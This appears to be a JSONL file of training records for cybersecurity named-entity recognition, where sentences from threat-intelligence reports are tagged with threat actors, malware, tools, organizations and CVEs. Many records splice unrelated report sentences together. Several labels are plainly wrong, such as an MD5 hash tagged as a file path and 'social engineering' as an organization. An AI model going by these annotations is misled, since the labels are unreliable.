{"text": "FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics ( CNIIHM ; a.k.a. ЦНИИХМ ) , a Russian government-owned technical research institution located in Moscow .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: TRITON": [[101, 107]], "ORGANIZATION: Central Scientific Research Institute of Chemistry and Mechanics": [[129, 193]], "ORGANIZATION: CNIIHM": [[196, 202]], "ORGANIZATION: ЦНИИХМ": [[212, 218]]}, "info": {"id": "cyberner_stix_train_000154", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day exploits": [[144, 161]], "SYSTEM: Windows": [[255, 262]]}, "info": {"id": "cyberner_stix_train_000155", "source": "cyberner_stix_train"}}
{"text": "Interestingly , there is a domain which used to point there , “ DlmDocumentsExchange.com ” . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"VULNERABILITY: CVE-2013-5065": [[136, 149]], "VULNERABILITY: EoP exploit": [[150, 161]], "ORGANIZATION: Microsoft": [[199, 208]], "THREAT_ACTOR: Neodymium": [[231, 240]], "THREAT_ACTOR: activity groups": [[280, 295]], "ORGANIZATION: economic": [[354, 362]], "THREAT_ACTOR: PROMETHIUM": [[375, 385]], "THREAT_ACTOR: NEODYMIUM": [[390, 399]]}, "info": {"id": "cyberner_stix_train_000156", "source": "cyberner_stix_train"}}
{"text": "Previously , it had used exploits to deliver and execute the first stage malware , while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain .", "spans": {}, "info": {"id": "cyberner_stix_train_000157", "source": "cyberner_stix_train"}}
{"text": "In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"THREAT_ACTOR: threat actor": [[87, 99]], "TOOL: hTran": [[131, 136]], "MALWARE: GozNym": [[159, 165]], "MALWARE: Trojan": [[211, 217]], "ORGANIZATION: banking customers": [[291, 308]]}, "info": {"id": "cyberner_stix_train_000158", "source": "cyberner_stix_train"}}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Adobe Flash Player exploit .", "spans": {"MALWARE: them": [[22, 26]], "TOOL: Adobe Flash Player": [[163, 181]], "VULNERABILITY: exploit": [[182, 189]]}, "info": {"id": "cyberner_stix_train_000159", "source": "cyberner_stix_train"}}
{"text": "Then the Trojan will put the patched library back into the system directory . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product . RevengeHotels : 74440d5d0e6ae9b9a03d06dd61718f66 . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": {"TOOL: VAMP": [[119, 123]], "THREAT_ACTOR: APT-C-23": [[167, 175]], "THREAT_ACTOR: RevengeHotels": [[236, 249]], "FILEPATH: 74440d5d0e6ae9b9a03d06dd61718f66": [[252, 284]]}, "info": {"id": "cyberner_stix_train_000160", "source": "cyberner_stix_train"}}
{"text": "Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . Once the user enters an account and password , it will initiate POST using AJAX .", "spans": {"THREAT_ACTOR: actor": [[29, 34]], "ORGANIZATION: defense contractors": [[129, 148]]}, "info": {"id": "cyberner_stix_train_000161", "source": "cyberner_stix_train"}}
{"text": "DroidJack RAT starts capturing sensitive information like call data , SMS data , videos , photos , etc . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The attackers actually based their attack on an existing Proof-of-Concept method that was published by researchers after the patch release . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": {"MALWARE: DroidJack RAT": [[0, 13]], "THREAT_ACTOR: admin@338": [[109, 118]], "ORGANIZATION: financial and policy organizations": [[147, 181]], "ORGANIZATION: audiences": [[270, 279]]}, "info": {"id": "cyberner_stix_train_000162", "source": "cyberner_stix_train"}}
{"text": "No Chrysaor apps were on Google Play . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector . The code added to the executable decrypts and launches the backdoor in-memory before resuming normal execution of the C Runtime initialization code and all the subsequent code of the host application . The eventual execution of the attack coincided with the start of a multi - day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities , including the city in which the victim was located .", "spans": {"MALWARE: Chrysaor": [[3, 11]], "SYSTEM: Google Play": [[25, 36]], "THREAT_ACTOR: RASPITE": [[39, 46]], "ORGANIZATION: electric utility sector": [[125, 148]]}, "info": {"id": "cyberner_stix_train_000163", "source": "cyberner_stix_train"}}
{"text": "These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments .", "spans": {"TOOL: IoT": [[93, 96]]}, "info": {"id": "cyberner_stix_train_000164", "source": "cyberner_stix_train"}}
{"text": "As we noted in M-Trends 2016 , Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment , so 99 days is still 96 days too long . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"ORGANIZATION: M-Trends": [[15, 23]], "ORGANIZATION: Mandiant’s": [[31, 41]], "ORGANIZATION: social engineering": [[226, 244]], "THREAT_ACTOR: actor": [[274, 279]], "ORGANIZATION: diaspora": [[358, 366]], "ORGANIZATION: government employees": [[391, 411]]}, "info": {"id": "cyberner_stix_train_000165", "source": "cyberner_stix_train"}}
{"text": "Based on the metadata of the Office documents and the PE files , the attackers had created the file on Wednesday , the 4th of October .", "spans": {"TOOL: Office": [[29, 35]], "TOOL: PE": [[54, 56]]}, "info": {"id": "cyberner_stix_train_000166", "source": "cyberner_stix_train"}}
{"text": "The actor delivered two more files into the victim ’s system folder : rasext.dll and msctfp.dat .", "spans": {"FILEPATH: rasext.dll": [[70, 80]], "FILEPATH: msctfp.dat": [[85, 95]]}, "info": {"id": "cyberner_stix_train_000167", "source": "cyberner_stix_train"}}
{"text": "The hacker 's name is Gnosticplayers , and since February 11 the hacker has put up for sale data for 32 companies in three rounds [stories on Round 1 , Round 2 , and Round 3] on Dream Market , a dark web marketplace . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release .", "spans": {"THREAT_ACTOR: PassCV": [[218, 224]], "MALWARE: RATs": [[307, 311]], "MALWARE: ZxShell": [[317, 324]], "MALWARE: Ghost RAT": [[329, 338]]}, "info": {"id": "cyberner_stix_train_000168", "source": "cyberner_stix_train"}}
{"text": "Hamas is not widely known for having a sophisticated mobile capability , which makes it unlikely they are directly responsible for ViperRAT . The group 's main objective is to steal source codes . If so , it spawns the service watchdog thread . Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": {"ORGANIZATION: Hamas": [[0, 5]], "MALWARE: ViperRAT": [[131, 139]], "TOOL: watchdog": [[227, 235]], "ORGANIZATION: Wall to Wall": [[245, 257]], "ORGANIZATION: Bullock": [[308, 315]], "ORGANIZATION: KrebsOnSecurity": [[322, 337]]}, "info": {"id": "cyberner_stix_train_000169", "source": "cyberner_stix_train"}}
{"text": "Third place is shared by Italy , Ukraine , and the United Kingdom . Waterbug also used an older version of PowerShell , likely to avoid logging . Throughout the multiple campaigns observed over the last 3 years , the actor has used an email attachment as the initial infection vector .", "spans": {"THREAT_ACTOR: Waterbug": [[68, 76]], "TOOL: PowerShell": [[107, 117]]}, "info": {"id": "cyberner_stix_train_000170", "source": "cyberner_stix_train"}}
{"text": "These activities depend on the device configuration . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Reverse Shell : The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": {"MALWARE: Microsoft Word document": [[114, 137]], "TOOL: Reverse Shell": [[257, 270]], "MALWARE: PIEHOP": [[287, 293]]}, "info": {"id": "cyberner_stix_train_000171", "source": "cyberner_stix_train"}}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese .", "spans": {"TOOL: ActiveX control": [[46, 61]], "MALWARE: JavaScript file": [[76, 91]], "VULNERABILITY: CVE-2013-7331": [[203, 216]]}, "info": {"id": "cyberner_stix_train_000172", "source": "cyberner_stix_train"}}
{"text": "BusyGasper – the unfriendly spy 29 AUG 2018 In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that , as it turned out , belonged to an unknown spyware family . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . Mimikatz ( Hacktool.Mimikatz ) : Tool designed to steal credentials . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": {"MALWARE: BusyGasper": [[0, 10]], "SYSTEM: Android": [[129, 136]], "THREAT_ACTOR: Lazarus": [[254, 261]], "ORGANIZATION: financial organizations": [[339, 362]], "MALWARE: Mimikatz": [[365, 373]], "MALWARE: Hacktool.Mimikatz": [[376, 393]], "MALWARE: COSMICENERGY": [[525, 537]], "ORGANIZATION: Rostelecom - Solar": [[601, 619]]}, "info": {"id": "cyberner_stix_train_000173", "source": "cyberner_stix_train"}}
{"text": "APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "TOOL: backdoors": [[26, 35]], "THREAT_ACTOR: Cobalt Strike": [[74, 87]], "TOOL: BEACON": [[88, 94]], "TOOL: backdoor": [[95, 103]], "THREAT_ACTOR: groups": [[112, 118]], "THREAT_ACTOR: Buhtrap": [[129, 136]], "MALWARE: Corkow": [[139, 145]], "THREAT_ACTOR: Carbanak": [[150, 158]], "ORGANIZATION: financial institutions": [[224, 246]], "ORGANIZATION: customers": [[257, 266]]}, "info": {"id": "cyberner_stix_train_000174", "source": "cyberner_stix_train"}}
{"text": "To catch these threats , security solutions used heuristics that focused on detecting this behavior . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work . ( A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": {"THREAT_ACTOR: Gorgon Group": [[154, 166]], "VULNERABILITY: SSRF vulnerability": [[366, 384]], "VULNERABILITY: CVE-2022 - 41040": [[388, 404]]}, "info": {"id": "cyberner_stix_train_000175", "source": "cyberner_stix_train"}}
{"text": "It is a custom obfuscation partly based on base85 encoding , which is in itself unusual , in malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA . The macro in this document gets executed when the user views the document and clicks Enable Content , at which point the macro locates and executes the data located under the Company field in the document ’s properties . All downloaders attempt to download an image file from a URL .", "spans": {"TOOL: macro": [[229, 234], [346, 351]]}, "info": {"id": "cyberner_stix_train_000176", "source": "cyberner_stix_train"}}
{"text": "The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and PROT without having to reestablish control over the infected machine hosting the PapaAlfa malware .", "spans": {"MALWARE: DEFENSOR ID": [[4, 15]], "SYSTEM: Google Play store": [[53, 70]], "THREAT_ACTOR: SLUB": [[125, 129]], "VULNERABILITY: CVE-2018-8174": [[184, 197]], "MALWARE: PapaAlfa": [[243, 251], [462, 470]], "THREAT_ACTOR: Lazarus": [[319, 326]], "MALWARE: malware": [[471, 478]]}, "info": {"id": "cyberner_stix_train_000177", "source": "cyberner_stix_train"}}
{"text": "Threat Group 3390 Cyberespionage .", "spans": {"THREAT_ACTOR: Threat Group 3390": [[0, 17]]}, "info": {"id": "cyberner_stix_train_000178", "source": "cyberner_stix_train"}}
{"text": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic , poisoning the NetBIOS Name Service , and spreading laterally via the EternalBlue exploit .", "spans": {"TOOL: sniffing passwords": [[73, 91]], "TOOL: Wi-Fi traffic": [[97, 110]], "TOOL: NetBIOS Name Service": [[127, 147]], "VULNERABILITY: EternalBlue": [[182, 193]]}, "info": {"id": "cyberner_stix_train_000179", "source": "cyberner_stix_train"}}
{"text": "The authors are trying to latch onto the popularity of the Super Mario Run game to target eagerly waiting Android users . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Investigators put the origin of the attack as Iranian ; Morphisec ’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns . This sample works in tandem with PIEHOP , which sets up the execution .", "spans": {"SYSTEM: Super Mario Run": [[59, 74]], "SYSTEM: Android": [[106, 113]], "THREAT_ACTOR: admin@338": [[143, 152]], "ORGANIZATION: media organizations": [[211, 230]], "ORGANIZATION: Morphisec": [[337, 346]], "MALWARE: OilRig": [[465, 471]]}, "info": {"id": "cyberner_stix_train_000180", "source": "cyberner_stix_train"}}
{"text": "type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis . Because of this , the allocated heaps will not be freed . Anonymous Sudan appeared to be a core driver of claimed attacks targeting countries further afield , and it is primarily responsible for the recent surge of Israeli targeting ; however , nearly half of claimed Anonymous Sudan attacks still focused on U.S. or European organizations .", "spans": {"TOOL: NoFuserEx": [[169, 178]], "TOOL: ConfuserEx Fixer": [[181, 197]], "TOOL: ConfuserEx Switch Killer": [[200, 224]], "TOOL: de4d0t": [[231, 237]], "THREAT_ACTOR: Anonymous Sudan": [[353, 368]], "THREAT_ACTOR: Anonymous Sudan attacks": [[563, 586]], "ORGANIZATION: U.S. or European organizations": [[604, 634]]}, "info": {"id": "cyberner_stix_train_000181", "source": "cyberner_stix_train"}}
{"text": "For example , version 9.0.7 ( 2017 ) featured the following set of commands : 2 , 4 , 8 , 11 , 12 , 15 , 16 , 17 , 18 , 19 , 20 . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system . This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code . But a layered , comprehensive cyber security strategy can do even more to keep your organization safe and secure .", "spans": {"TOOL: web shells": [[168, 178]]}, "info": {"id": "cyberner_stix_train_000182", "source": "cyberner_stix_train"}}
{"text": "After alternating for over four months with Dridex , Locky became the payload of choice for TA505 , eclipsing earlier campaigns in terms of volume and reach .", "spans": {"MALWARE: Dridex": [[44, 50]], "MALWARE: Locky": [[53, 58]], "THREAT_ACTOR: TA505": [[92, 97]]}, "info": {"id": "cyberner_stix_train_000183", "source": "cyberner_stix_train"}}
{"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"MALWARE: Pony malware": [[102, 114]], "MALWARE: WhiteBear": [[183, 192]], "ORGANIZATION: embassies": [[217, 226]]}, "info": {"id": "cyberner_stix_train_000184", "source": "cyberner_stix_train"}}
{"text": "We have seen different HawkEye campaigns infecting organizations across many sectors globally , and stealing user credentials for diverse online services . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"THREAT_ACTOR: HawkEye": [[23, 30]], "ORGANIZATION: citizens—journalists": [[164, 184]], "ORGANIZATION: software developers": [[187, 206]], "ORGANIZATION: politicians": [[209, 220]], "ORGANIZATION: researchers at universities": [[223, 250]], "ORGANIZATION: artists": [[257, 264]], "THREAT_ACTOR: Pawn Storm": [[286, 296]]}, "info": {"id": "cyberner_stix_train_000185", "source": "cyberner_stix_train"}}
{"text": "For now , users can make the best of the knowledge they have now to significantly reduce the effectivity of such malware . Given the available data , we assess that APT28 's work is sponsored by the Russian government . Similar to text mode receiver, after AdrGen builds the string, a function to manually build and send the DNS query packet is . Suspicious Login Patterns on NetScaler", "spans": {"THREAT_ACTOR: APT28": [[165, 170]], "MALWARE: AdrGen": [[257, 263]]}, "info": {"id": "cyberner_stix_train_000186", "source": "cyberner_stix_train"}}
{"text": "A recent whois of “ goldncup.com ” . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines . The large grouping on the right of the diagram are direct variants of the sample referenced in this write up . One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": {"ORGANIZATION: social engineering": [[47, 65]], "THREAT_ACTOR: actor": [[95, 100]], "ORGANIZATION: diaspora": [[179, 187]], "ORGANIZATION: government employees": [[212, 232]], "ORGANIZATION: Hack520": [[394, 401]]}, "info": {"id": "cyberner_stix_train_000187", "source": "cyberner_stix_train"}}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected .", "spans": {"MALWARE: Silence.Main Trojan": [[4, 23]], "MALWARE: Corkow": [[174, 180]], "THREAT_ACTOR: Metel": [[183, 188]], "MALWARE: Trojan": [[191, 197]]}, "info": {"id": "cyberner_stix_train_000188", "source": "cyberner_stix_train"}}
{"text": "Tor onto users ’ Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim ’ s location to an Iranian mobile phone number . Gallmaker 's targets are embassies of an Eastern European country . then calls optblock_t : :f unc callback . The regex , and thus the rule , will match only the requests made to the endpoint of the Microsoft Exchange server .", "spans": {"SYSTEM: Tor": [[0, 3]], "SYSTEM: Android": [[17, 24]], "THREAT_ACTOR: Gallmaker": [[184, 193]], "ORGANIZATION: embassies": [[209, 218]], "TOOL: calls optblock_t : :f unc": [[257, 282]]}, "info": {"id": "cyberner_stix_train_000189", "source": "cyberner_stix_train"}}
{"text": "STEALING SENSITIVE INFORMATION FakeSpy has multiple built in information stealing capabilities . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {"MALWARE: FakeSpy": [[31, 38]], "THREAT_ACTOR: actor": [[117, 122]], "TOOL: HyperBro": [[158, 166]], "THREAT_ACTOR: Emissary Panda": [[200, 214]], "THREAT_ACTOR: Honeybee": [[240, 248]]}, "info": {"id": "cyberner_stix_train_000190", "source": "cyberner_stix_train"}}
{"text": "Attackers are keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning . These backdoors give APT intruders a laundry list of ways to control victim systems . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": {"SYSTEM: Android": [[155, 162]], "TOOL: Nymaim": [[236, 242]], "TOOL: Gozi malware": [[247, 259]], "THREAT_ACTOR: attackers": [[446, 455]]}, "info": {"id": "cyberner_stix_train_000191", "source": "cyberner_stix_train"}}
{"text": "It shows a web phishing page whenever the affected device receives a broadcast event ( i.e. , if a new package is installed or if the device ’ s screen is on ) to steal personal data , such as those keyed in for banking apps . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . An interesting part of the script is the continuous killing of every “ rundll32.exe ” process running into the victim machine , generates a huge amount of noise , as visible in the following process explorer view .", "spans": {"ORGANIZATION: (DNC)": [[353, 358]], "FILEPATH: rundll32.exe": [[432, 444]]}, "info": {"id": "cyberner_stix_train_000192", "source": "cyberner_stix_train"}}
{"text": "Restrict administrative privileges .", "spans": {}, "info": {"id": "cyberner_stix_train_000193", "source": "cyberner_stix_train"}}
{"text": "It ’ s also worth noting that both campaigns repackage apps that are commonly used in their target ’ s countries , such as Telegram , Kik , and Plus messaging apps . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 . As we were looking at the content of the website , it became evident that almost all of the text used was lifted from legitimate security-company websites . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": {"SYSTEM: Telegram": [[123, 131]], "SYSTEM: Kik": [[134, 137]], "SYSTEM: Plus": [[144, 148]], "SYSTEM: Operating systems": [[437, 454]], "SYSTEM: system files": [[519, 531]]}, "info": {"id": "cyberner_stix_train_000194", "source": "cyberner_stix_train"}}
{"text": "The specific apps can be found in the target list in the appendix . We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . Though Daserf wasn’t a popular attack tool at the time of publishing the two reports , it dates back to at least 2011 .", "spans": {"THREAT_ACTOR: APT10": [[83, 88]], "MALWARE: Daserf": [[255, 261]]}, "info": {"id": "cyberner_stix_train_000195", "source": "cyberner_stix_train"}}
{"text": "Based on the use of the relatively unique PLAINTEE malware , the malware 's use of the same file paths on in each cluster , and the similar targeting , we have grouped these attacks together under the RANCOR campaign moniker . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"TOOL: PLAINTEE malware": [[42, 58]], "TOOL: emails": [[234, 240]], "ORGANIZATION: government officials": [[255, 275]], "FILEPATH: malicious Microsoft Word document": [[317, 350]], "VULNERABILITY: CVE-2012-0158": [[370, 383]]}, "info": {"id": "cyberner_stix_train_000196", "source": "cyberner_stix_train"}}
{"text": "We find multiple file/object names hinting at the version , but must compelling :", "spans": {}, "info": {"id": "cyberner_stix_train_000197", "source": "cyberner_stix_train"}}
{"text": "Initialization of the compiler object The plugins can be added in runtime , or they can be added as a package resource at packaging time . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[182, 193]], "ORGANIZATION: Palo Alto": [[224, 233]], "THREAT_ACTOR: APT37": [[282, 287]], "ORGANIZATION: research fellow": [[299, 314]], "ORGANIZATION: advisory member": [[317, 332]], "ORGANIZATION: journalist": [[339, 349]], "ORGANIZATION: strategic organizations": [[413, 436]]}, "info": {"id": "cyberner_stix_train_000198", "source": "cyberner_stix_train"}}
{"text": "It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port .", "spans": {}, "info": {"id": "cyberner_stix_train_000199", "source": "cyberner_stix_train"}}
{"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques . The MOF file created by the VBScript is used as a persistence mechanism via Windows B-TOOL S-OS Management Instrumentation ( WMI ) Event Subscriptions . This CVE is in CISA 's Known Exploited Vulnerabilities Catalog Reference CISA 's BOD 22 - 01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements .", "spans": {"THREAT_ACTOR: MuddyWaters group": [[96, 113]], "TOOL: MOF file": [[317, 325]], "TOOL: VBScript": [[341, 349]], "TOOL: WMI": [[438, 441]], "VULNERABILITY: CVE": [[471, 474]], "ORGANIZATION: CISA 's": [[481, 488], [539, 546]], "VULNERABILITY: Known Exploited Vulnerabilities": [[489, 520], [563, 594]]}, "info": {"id": "cyberner_stix_train_000200", "source": "cyberner_stix_train"}}
{"text": "TeamViewer — This remote control and desktop-sharing tool has applications for legitimate and malicious system users .", "spans": {"TOOL: TeamViewer": [[0, 10]]}, "info": {"id": "cyberner_stix_train_000201", "source": "cyberner_stix_train"}}
{"text": "Last month , QiAnXin captured multiple phishing emails sent by TA505 Group to target financial institutions . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook .", "spans": {"ORGANIZATION: QiAnXin": [[13, 20]], "THREAT_ACTOR: TA505": [[63, 68]], "ORGANIZATION: financial": [[85, 94]], "FILEPATH: decoy documents": [[131, 146]], "ORGANIZATION: Cambodia Government": [[229, 248]], "ORGANIZATION: Facebook": [[277, 285]]}, "info": {"id": "cyberner_stix_train_000202", "source": "cyberner_stix_train"}}
{"text": "The carrier can determine that the request originates from the user ’ s device , but does not require any interaction from the user that can not be automated . Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state . FileTime Get time information about a file . While there may be other groups they want to target also , they tend to be more persistent .", "spans": {}, "info": {"id": "cyberner_stix_train_000203", "source": "cyberner_stix_train"}}
{"text": "Although TA505 initially distributed Dridex botnet ID 125 , they were observed using botnet ID 220 in March 2015 and botnet ID 223 in December of that year .", "spans": {"THREAT_ACTOR: TA505": [[9, 14]], "MALWARE: Dridex": [[37, 43]]}, "info": {"id": "cyberner_stix_train_000204", "source": "cyberner_stix_train"}}
{"text": "Pasting Bitly URLs , appended with a plus sign , into the address bar of a web browser reveals the full URL .", "spans": {"TOOL: Bitly": [[8, 13]]}, "info": {"id": "cyberner_stix_train_000205", "source": "cyberner_stix_train"}}
{"text": "Now , they are expanding their activity to audiences all around the world . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets .", "spans": {"THREAT_ACTOR: cluster": [[101, 108]], "TOOL: CobaltStrike": [[133, 145]], "TOOL: Powershell": [[155, 165]], "THREAT_ACTOR: APT15": [[228, 233]], "MALWARE: Mimikatz": [[258, 266]]}, "info": {"id": "cyberner_stix_train_000206", "source": "cyberner_stix_train"}}
{"text": "Since 2009 , HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims ; some intrusions have resulted in the Exfiltration of data while others have been disruptive in nature .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[13, 25]]}, "info": {"id": "cyberner_stix_train_000207", "source": "cyberner_stix_train"}}
{"text": "This brand new malware has real potential to become the next big mobile malware , as it is under constant iterative improvements , abuses a critical operating system feature , and targets financial applications . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\… \" .", "spans": {"ORGANIZATION: Symantec": [[213, 221]], "TOOL: Trojan.Naid": [[285, 296]], "MALWARE: Backdoor.Moudoor": [[301, 317]], "TOOL: Aurora": [[336, 342]], "THREAT_ACTOR: Elderwood Gang": [[352, 366]], "THREAT_ACTOR: Hidden Lynx": [[376, 387]], "ORGANIZATION: Palo Alto Networks": [[434, 452]], "MALWARE: Elise": [[603, 608]]}, "info": {"id": "cyberner_stix_train_000208", "source": "cyberner_stix_train"}}
{"text": "To protect yourself from these threats , FireEye suggests that users : Take caution before clicking any links where you are not sure about the origin . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 . We named this RAT \" JhoneRAT \" . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"ORGANIZATION: FireEye": [[41, 48]], "ORGANIZATION: Mandiant": [[224, 232]], "TOOL: RAT": [[264, 267]], "MALWARE: JhoneRAT": [[270, 278]], "ORGANIZATION: Bradshaw": [[288, 296]], "ORGANIZATION: he and his then - girlfriend": [[326, 354]]}, "info": {"id": "cyberner_stix_train_000209", "source": "cyberner_stix_train"}}
{"text": "This allows the “ boot ” module to execute the payloads when the infected application is started . Most modules were created in 2012 . To initiate process hollowing , the loader DLL E-TOOL targets two legitimate system processes , for example svchost.exe or nslookup.exe , and spawns them in a suspended state . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"TOOL: process hollowing": [[147, 164]], "TOOL: the loader": [[167, 177]], "TOOL: DLL E-TOOL": [[178, 188]], "FILEPATH: svchost.exe": [[243, 254]], "FILEPATH: nslookup.exe": [[258, 270]], "MALWARE: NetSupport RAT": [[350, 364]]}, "info": {"id": "cyberner_stix_train_000210", "source": "cyberner_stix_train"}}
